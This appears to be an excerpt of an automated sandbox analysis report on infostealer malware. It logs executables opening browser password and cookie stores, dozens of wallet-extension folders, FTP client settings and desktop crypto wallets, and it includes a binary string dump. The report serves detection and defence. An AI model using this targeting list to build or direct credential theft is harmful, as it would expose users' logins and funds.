Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

Source: random.exe	Binary or memory string: WIN_81
Source: random.exe	Binary or memory string: WIN_XP
Source: 84b9c8b064.exe, 0000001F.00000000.2537530343.0000000000B12000.00000002.00000001.01000000.00000017.sdmp	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: random.exe	Binary or memory string: WIN_XPe
Source: random.exe	Binary or memory string: WIN_VISTA
Source: random.exe	Binary or memory string: WIN_7
Source: random.exe	Binary or memory string: WIN_8

Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS
